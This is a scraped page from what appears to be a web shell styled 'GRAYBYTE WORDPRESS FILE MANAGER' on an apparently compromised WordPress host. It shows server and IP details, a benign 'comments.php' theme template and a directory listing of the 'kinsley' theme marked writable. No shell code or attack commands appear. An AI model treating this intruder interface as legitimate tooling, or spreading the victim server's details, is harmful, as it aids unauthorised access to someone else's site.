✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/builxejc/public_html/wp-content/themes/kinsley//comments.php
<?php
/**
 * The template for displaying comments
 *
 * This is the template that displays the area of the page that contains both the current comments
 * and the comment form.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package kinsley
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() ) {
	return;
}
?>

<div id="comments" class="post-comments">

<?php
	// You can start editing here -- including this comment!
	if ( have_comments() ) :
?>

<!-- comments -->
<section class="knsl-mb-30">
	<div class="row">
		<div class="col-lg-12">
			<h3 class="knsl-mb-40"><?php comments_number( esc_html__( 'No comments found', 'kinsley' ), esc_html__( '1 Comment', 'kinsley' ), esc_html__( '% Comments', 'kinsley' ) ); ?></h3>
		</div>

		<div class="col-lg-12">

			<!-- comments -->
			<ul class="knsl-comments-list">
				<?php
				wp_list_comments( array(
					'style'	  => 'ul',
					'avatar_size' => '80',
					'callback' => 'kinsley_comment'
				) );
				?>
			</ul>

			<?php
			the_comments_navigation( array(
				'screen_reader_text' => ' ',
				'prev_text' => esc_html__( 'Older comments', 'kinsley' ),
				'next_text' => esc_html__( 'Newer comments', 'kinsley' )
			) );

			// If comments are closed and there are comments, let's leave a little note, shall we?
			if ( ! comments_open() ) :
				?>
				<p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'kinsley' ); ?></p>
				<?php
			endif; ?>

		</div>
	</div>
</section>
<!-- comments end -->
<?php endif; // Check for have_comments(). ?>

<section class="form-comment knsl-scroll-animation<?php if ( comments_open() ) : ?> form-comment-open<?php endif; ?>">
		<?php
			$req = get_option( 'require_name_email' );
			$aria_req = ( $req ? " aria-required='true'" : '' );

			$comment_args = array(
				'title_reply' => esc_html__( 'Write a comment', 'kinsley' ),
				'title_reply_to' => esc_html__( 'Write a comment to %s', 'kinsley' ),
				'cancel_reply_link' => esc_html__( 'Cancel Reply', 'kinsley' ),
				'title_reply_before' => '<div class="comment-reply-title" id="reply-title"><h3 class="knsl-mb-40">',
				'title_reply_after' => '</h3></div>',
				'label_submit' => esc_html__( 'Submit', 'kinsley' ),
				'comment_field' => '<div class="form-comment-group"><textarea placeholder="' . esc_attr__( 'Comment', 'kinsley' ).'" id="comment" name="comment" aria-required="true" rows="6"></textarea></div>',
				'must_log_in' => '<p class="must-log-in">' . esc_html__( 'You must be ', 'kinsley' ) . '<a href="' . esc_url( wp_login_url( apply_filters( 'the_permalink', get_permalink( ) ) ) ) . '">' . esc_html__( 'logged in', 'kinsley' ) . '</a>' . esc_html__( ' to post a comment.', 'kinsley' ) . '</p>',
				'logged_in_as' => '<p class="logged-in-as">' . esc_html__( 'Logged in as ', 'kinsley' ) . '<a href="' . esc_url( admin_url( 'profile.php' ) ) . '">' . esc_html( $user_identity ) . '</a>' . esc_html__( '. ', 'kinsley' ) . '<a href="' . esc_url( wp_logout_url( apply_filters( 'the_permalink', get_permalink( ) ) ) ) . '" title="' . esc_attr__( 'Log out of this account', 'kinsley' ) . '">' . esc_html__( 'Log out?', 'kinsley' ) . '</a></p>',
				'comment_notes_before' => '',
				'comment_notes_after' => '',
				'fields' => apply_filters( 'comment_form_default_fields', array(
					'author' => '<div class="form-comment-group"><input id="author" name="author" type="text" placeholder="' . esc_attr__( 'Name', 'kinsley' ) . '" value="" ' . $aria_req . ' /></div>',
					'email' => '<div class="form-comment-group"><input id="email" name="email" type="text" placeholder="' . esc_attr__( 'Email', 'kinsley' ) . '" value="" ' . $aria_req . ' /></div>',
				)),
				'class_submit' => 'knsl-btn',
				'submit_field' => '<div class="form-comment-submit">%1$s %2$s</div>',
				'submit_button' => '<button type="submit" name="%1$s" id="%2$s" class="%3$s">%4$s</button>'
			);

			comment_form( $comment_args );
		?>
</section>

</div><!-- #comments -->


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
12 Jun 2026 9.19 PM
builxejc / builxejc
0755
assets
--
28 Apr 2026 8.56 AM
builxejc / builxejc
0755
hotel-booking
--
28 Apr 2026 8.56 AM
builxejc / builxejc
0755
inc
--
28 Apr 2026 8.56 AM
builxejc / builxejc
0755
languages
--
28 Apr 2026 8.56 AM
builxejc / builxejc
0755
template-parts
--
28 Apr 2026 12.11 PM
builxejc / builxejc
0755
woocommerce
--
28 Apr 2026 8.56 AM
builxejc / builxejc
0755
.htaccess
0.41 KB
28 Apr 2026 8.56 AM
builxejc / builxejc
0644
404.php
1.452 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
archive-mphb_room_service.php
0.256 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
archive-mphb_room_type.php
0.253 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
archive.php
0.726 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
comments.php
4.013 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
footer.php
1.672 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
functions.php
22.005 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
header.php
3.798 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
home.php
0.11 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
index.php
0.934 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
page.php
2.239 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
rtl.css
28.745 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
screenshot.png
896.964 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
search.php
1.004 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
sidebar.php
0.37 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
single.php
2.652 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
style.css
267.931 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
taxonomy-mphb_room_type_category.php
0.253 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
taxonomy-mphb_room_type_facility.php
0.253 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
taxonomy-mphb_room_type_tag.php
0.253 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
template-full-width.php
0.75 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
template-layout-builder.php
0.343 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
woocommerce.php
0.233 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644
wpml-config.xml
15.208 KB
18 Nov 2024 1.14 PM
builxejc / builxejc
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF